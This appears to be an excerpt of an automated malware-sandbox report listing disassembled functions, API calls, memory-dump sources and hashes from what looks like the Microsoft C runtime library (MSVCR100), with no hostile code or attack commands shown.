                                                                                                          • Instruction ID: bfa54cb2b5beefefc3113a1e023784c56538b1c8b3191d300ee7747bb073788c
                                                                                                          • Opcode Fuzzy Hash: 0c0c0034ab63c6c38f5f2b86563cc2b694d3fa6b035523e7fb6cd6d81960d2c1
                                                                                                          • Instruction Fuzzy Hash: C4418FB8A42301EFDB24DF65EC8AB3A7768EB04751B14401AF50DD63E0CAB08E45CB31
                                                                                                          Function 6FDFC2AC Relevance: 15.1, APIs: 10, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD806FC: GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                            • Part of subcall function 6FD806FC: __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD806FC: SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • _calloc_crt.MSVCR100(00000086,00000002), ref: 6FDFC2D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$__set_flsgetvalue_calloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 1280036888-0
                                                                                                          • Opcode ID: e8022ddc7840a1eb3a3b9d6f1feb21bba0e3aa5de5bbc54aa47cef8f3ee48847
                                                                                                          • Instruction ID: c5132b8e19b94f4dfc109a83400187773084869ff2715a8098ab60adcbcacf01
                                                                                                          • Opcode Fuzzy Hash: e8022ddc7840a1eb3a3b9d6f1feb21bba0e3aa5de5bbc54aa47cef8f3ee48847
                                                                                                          • Instruction Fuzzy Hash: 2721F3B2A06310ABD7903B789C41E6F37ECCF453ACB12052AF911D6191FB21BB528279
                                                                                                          Function 6FDF4EC7 Relevance: 15.1, APIs: 10, Instructions: 94stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000E,6FDF4FD8,00000010,6FDF3745,?,?), ref: 6FDF4EE3
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • __unDNameHelper.MSVCR100(00000000,?,00000000,00002800,6FDF4FD8,00000010,6FDF3745,?,?), ref: 6FDF4F00
                                                                                                            • Part of subcall function 6FDF4E94: __unDName.MSVCR100(?,?,?,?,?,00000000,?,6FDF4F05,00000000,?,00000000,00002800,6FDF4FD8,00000010,6FDF3745), ref: 6FDF4EBD
                                                                                                          • _local_unwind4.MSVCR100(6FE24610,?,000000FE), ref: 6FDF4F1C
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDF4F2C
                                                                                                          • malloc.MSVCR100(00000008), ref: 6FDF4F50
                                                                                                          • malloc.MSVCR100(00000001), ref: 6FDF4F60
                                                                                                          • strcpy_s.MSVCR100(00000000,00000001,?), ref: 6FDF4F71
                                                                                                          • free.MSVCR100(?), ref: 6FDF4FA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name__unmalloc$CriticalEnterHelperSection_local_unwind4_lockfreestrcpy_sstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1424006541-0
                                                                                                          • Opcode ID: 4c799edd0ac1b33c27be11a13d07620e359813c84b8982214f4e4669b86f0dd0
                                                                                                          • Instruction ID: d593e083515dc4e2ec67244ef11a217391d6909926e93b3c69b328567ab04428
                                                                                                          • Opcode Fuzzy Hash: 4c799edd0ac1b33c27be11a13d07620e359813c84b8982214f4e4669b86f0dd0
                                                                                                          • Instruction Fuzzy Hash: FA210972C06315AED7909F24CE40E5D77F4BF06764F16865AF42CAB2C0DB34B9428760
                                                                                                          Function 6FD97ED9 Relevance: 15.1, APIs: 10, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FD97F0C
                                                                                                          • _errno.MSVCR100(?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA93FC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA9407
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA9425
                                                                                                          • _errno.MSVCR100 ref: 6FDA9432
                                                                                                          • _errno.MSVCR100 ref: 6FDA943C
                                                                                                          • _errno.MSVCR100 ref: 6FDA946C
                                                                                                          • _errno.MSVCR100 ref: 6FDA9476
                                                                                                          • _errno.MSVCR100 ref: 6FDA9489
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA9494
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: fa6fdb0bcf217a2e33b1311ef7632c1e6ed770905132b93393bc28e1d2212203
                                                                                                          • Instruction ID: e4733d3129ef521560f657446e3725c413c994f3c4b7a0b581059a12745c21b3
                                                                                                          • Opcode Fuzzy Hash: fa6fdb0bcf217a2e33b1311ef7632c1e6ed770905132b93393bc28e1d2212203
                                                                                                          • Instruction Fuzzy Hash: E5218B31801309EA8BE16FB4C84499A3734AF82378F114799E9755B1E4CBB3B440C7BB
                                                                                                          Function 6FD90CD7 Relevance: 15.1, APIs: 10, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • wcslen.MSVCR100(00000000,6FD90D48,0000000C), ref: 6FD90D65
                                                                                                          • calloc.MSVCR100(00000001,00000002,00000000,6FD90D48,0000000C), ref: 6FD90D70
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000001,00000000), ref: 6FD90D87
                                                                                                          • _errno.MSVCR100(6FD90D48,0000000C), ref: 6FDB08C0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD90D48,0000000C), ref: 6FDB08CA
                                                                                                          • _errno.MSVCR100 ref: 6FDB08DB
                                                                                                          • _errno.MSVCR100 ref: 6FDB08E6
                                                                                                            • Part of subcall function 6FD90C66: wcslen.MSVCR100(00000000,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD90C88
                                                                                                            • Part of subcall function 6FD90C66: wcslen.MSVCR100(00000000,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD90C9B
                                                                                                            • Part of subcall function 6FD90C66: _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD90CB8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errnowcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 505790351-0
                                                                                                          • Opcode ID: 708f8b6991b51198853f2df6b52ff741d998a5a74510982f965e3f4484e33239
                                                                                                          • Instruction ID: 996e49db8b455757d3511ddf10c72cbf3abacb78808add94b7e25b758bd34bd4
                                                                                                          • Opcode Fuzzy Hash: 708f8b6991b51198853f2df6b52ff741d998a5a74510982f965e3f4484e33239
                                                                                                          • Instruction Fuzzy Hash: 232126B4941315DFC781AFB8DC4858D3774AF45BD4F21AA15E064AF2C0CB74BA408BE0
                                                                                                          Function 6FDFC394 Relevance: 15.1, APIs: 10, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFC3A2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFC3AC
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDFC3CF
                                                                                                          • wcscpy_s.MSVCR100(?,?,?), ref: 6FDFC3DF
                                                                                                          • wcscat_s.MSVCR100(?,?,6FDB31F0), ref: 6FDFC3F2
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFC405
                                                                                                          • _errno.MSVCR100 ref: 6FDFC40A
                                                                                                          • wcslen.MSVCR100(?,00000000), ref: 6FDFC412
                                                                                                          • wcslen.MSVCR100(?,?,00000000), ref: 6FDFC41C
                                                                                                          • _wcserror_s.MSVCR100(00000000,?,00000000), ref: 6FDFC426
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcslen$_errno$_invalid_parameter_invalid_parameter_noinfo_invoke_watson_wcserror_swcscat_swcscpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3148939141-0
                                                                                                          • Opcode ID: 3e6693604270ef788bddbd12483683fd2fadf663d1f212684d1eaad818ad2f07
                                                                                                          • Instruction ID: d34f29c01211e09915d2ab91353b584cc62b39b2296d5b1e1a01843217becc36
                                                                                                          • Opcode Fuzzy Hash: 3e6693604270ef788bddbd12483683fd2fadf663d1f212684d1eaad818ad2f07
                                                                                                          • Instruction Fuzzy Hash: 3011C877942315A7D7912B799C84EBB3BAC9E856AC7120026FC15DB190EB20F612D1B1
                                                                                                          Function 6FD846C8 Relevance: 15.1, APIs: 10, Instructions: 70memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • HeapReAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FD84701
                                                                                                          • malloc.MSVCR100(00000001,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FD8477D
                                                                                                          • free.MSVCR100(00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF35F
                                                                                                          • _callnewh.MSVCR100(00000001,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF37B
                                                                                                          • _callnewh.MSVCR100(00000001,00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF38C
                                                                                                          • _errno.MSVCR100(00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF392
                                                                                                          • _errno.MSVCR100(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3A4
                                                                                                          • GetLastError.KERNEL32(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3AB
                                                                                                          • _errno.MSVCR100(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3BC
                                                                                                          • GetLastError.KERNEL32(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2627451454-0
                                                                                                          • Opcode ID: 560783c975f213deb75b1c8a523b4b2341a335441ba5d740ee4b743ee98b03c2
                                                                                                          • Instruction ID: 0a0feea72543aaad743ceb5a655a7daa60bc03531a38f25e368762dbe8fa97fe
                                                                                                          • Opcode Fuzzy Hash: 560783c975f213deb75b1c8a523b4b2341a335441ba5d740ee4b743ee98b03c2
                                                                                                          • Instruction Fuzzy Hash: DA11B236405B11EBDB913F78DC0478A3BA8BF473A5B108666E8A49F1D0EB31F85087A4
                                                                                                          Function 6FDCC601 Relevance: 15.1, APIs: 10, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDCC611
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCC61C
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC626
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000214), ref: 6FDCC632
                                                                                                          • _getptd.MSVCR100 ref: 6FDCC63F
                                                                                                          • _initptd.MSVCR100(00000000,?), ref: 6FDCC648
                                                                                                          • CreateThread.KERNEL32(?,?,6FDCC59C,00000000,?,?), ref: 6FDCC676
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC680
                                                                                                          • free.MSVCR100(00000000), ref: 6FDCC689
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCC694
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateErrorLastThread__set_flsgetvalue_calloc_crt_dosmaperr_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                                                                                          • String ID:
                                                                                                          • API String ID: 3414405836-0
                                                                                                          • Opcode ID: 3545b7ff6449f67175a2bf5a2fecc718077393f187b28fa9385fccb887a7bcd1
                                                                                                          • Instruction ID: ff8bde02ec82876f74256ef7012c1d7786fd7d14546785cfd37e9789d76478c6
                                                                                                          • Opcode Fuzzy Hash: 3545b7ff6449f67175a2bf5a2fecc718077393f187b28fa9385fccb887a7bcd1
                                                                                                          • Instruction Fuzzy Hash: B1110C32145785AFD7526FA5DC44D8B37ECEF05374B100119FA658B190DB71F4124A75
                                                                                                          Function 6FD82BD6 Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 486stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _isleadbyte_l.MSVCR100(?,?), ref: 6FD82CBF
                                                                                                          • _mbtowc_l.MSVCR100(?,?,?), ref: 6FD82D54
                                                                                                          • strlen.MSVCR100(6FDB3088), ref: 6FD82DDB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _isleadbyte_l_mbtowc_lstrlen
                                                                                                          • String ID: $g
                                                                                                          • API String ID: 1777857954-3845294767
                                                                                                          • Opcode ID: 71af5ac3a72da1574f4ab75b723dd8efaba7cd9f21e458ca8b4598dbd6fc9237
                                                                                                          • Instruction ID: fc4a1809d9dc6e64e6fdbc9c497f025010a3572bacea5fec6b8231d04ede1341
                                                                                                          • Opcode Fuzzy Hash: 71af5ac3a72da1574f4ab75b723dd8efaba7cd9f21e458ca8b4598dbd6fc9237
                                                                                                          • Instruction Fuzzy Hash: DB226EF1904329CADBA08F28CD817D9B7B4AF45319F0042EAD66CA7281D774BAC5CF58
                                                                                                          Function 6FDF2499 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 400COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • malloc.MSVCR100(-00000008), ref: 6FDF2583
                                                                                                          • _freea_s.MSVCR100(?), ref: 6FDF25DB
                                                                                                          • _isleadbyte_l.MSVCR100(?,?,?,?,?,?,00000000,?,?,6FDF2A14,?,?), ref: 6FDF2645
                                                                                                          • _isleadbyte_l.MSVCR100(00000000,?,?,?,?,?,00000000,?,?,6FDF2A14,?,?), ref: 6FDF2723
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _isleadbyte_l$_freea_smalloc
                                                                                                          • String ID: a/p$am/pm
                                                                                                          • API String ID: 263439597-3206640213
                                                                                                          • Opcode ID: 9608b70dfb50415846026ecde6699a2b469ba4eca59d9b8e016d2001d6a91485
                                                                                                          • Instruction ID: 7a6a2ed43dfc9d70a30685189464feba09123acaacdf03346a758492304f5137
                                                                                                          • Opcode Fuzzy Hash: 9608b70dfb50415846026ecde6699a2b469ba4eca59d9b8e016d2001d6a91485
                                                                                                          • Instruction Fuzzy Hash: D3D1C2349163C6DADB858F68C850FE97BB0EF0A31EF12419BC8A09B251C731B947CB61
                                                                                                          Function 6FE16FED Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 117COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: sqrt
                                                                                                          • String ID: (go$@go$Pgo$pgo$go
                                                                                                          • API String ID: 1201437784-4062922410
                                                                                                          • Opcode ID: ad43ab33aa7a10e04ea316c75b3a186b3798dcb6397dc0082929cdadc62878af
                                                                                                          • Instruction ID: 6f1e177eeefbd3f9c28022ce0f82a01245756b5723e102746940e68321c7d21f
                                                                                                          • Opcode Fuzzy Hash: ad43ab33aa7a10e04ea316c75b3a186b3798dcb6397dc0082929cdadc62878af
                                                                                                          • Instruction Fuzzy Hash: F94153A2D01E49E7DF092F64E91A1883FB4F74B761B720BC4D481A52A8FF3195798781
                                                                                                          Function 6FD84F5D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(?,?,?,?,?,?,?,6FD85088,00000014), ref: 6FD84F77
                                                                                                            • Part of subcall function 6FD85258: _getptd.MSVCR100(6FD852B8,0000000C,6FDA9FD5,?,?,6FD843AA,?), ref: 6FD85264
                                                                                                            • Part of subcall function 6FD85258: _lock.MSVCR100(0000000C), ref: 6FD8527B
                                                                                                          • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6FD84F97
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FD84FAD
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                            • Part of subcall function 6FD84D42: _unlock.MSVCR100(0000000C,6FD84FC9), ref: 6FD84D44
                                                                                                            • Part of subcall function 6FD851A2: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6FD85218
                                                                                                          • strcmp.MSVCR100(00000000,6FE24BC0), ref: 6FD84FF0
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FD85001
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,6FD85088,00000014), ref: 6FDB0C90
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6FD85088,00000014), ref: 6FDB0C9B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lock$_getptdstrcmp$CriticalEnterSection_calloc_crt_errno_invalid_parameter_noinfo_unlock
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 1805727365-2441139153
                                                                                                          • Opcode ID: 11243904f1182261e9c6a70cc875751c9c8ac100d5982a0b87f373df5bbc7a34
                                                                                                          • Instruction ID: 5b95fa4f5211d45458401cd7dafafaef3528301755915aaaa49de1aa71bb1e89
                                                                                                          • Opcode Fuzzy Hash: 11243904f1182261e9c6a70cc875751c9c8ac100d5982a0b87f373df5bbc7a34
                                                                                                          • Instruction Fuzzy Hash: 3531CD71908304DBEB809FA89845B8D7BF4BF46368F20811EE8365B2C1DF74B5409A25
                                                                                                          Function 6FDDA3E9 Relevance: 13.8, APIs: 9, Instructions: 269COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA40B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA416
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 340685940-0
                                                                                                          • Opcode ID: 6790f5351a6c2a9ae733bfb45d1f12f1e995a3eb659152e61ed67d9000599df3
                                                                                                          • Instruction ID: 3bab059b5e4f1a925c9f45fab75bd16664fbf14480f71e6c3c969cdfa621ab6b
                                                                                                          • Opcode Fuzzy Hash: 6790f5351a6c2a9ae733bfb45d1f12f1e995a3eb659152e61ed67d9000599df3
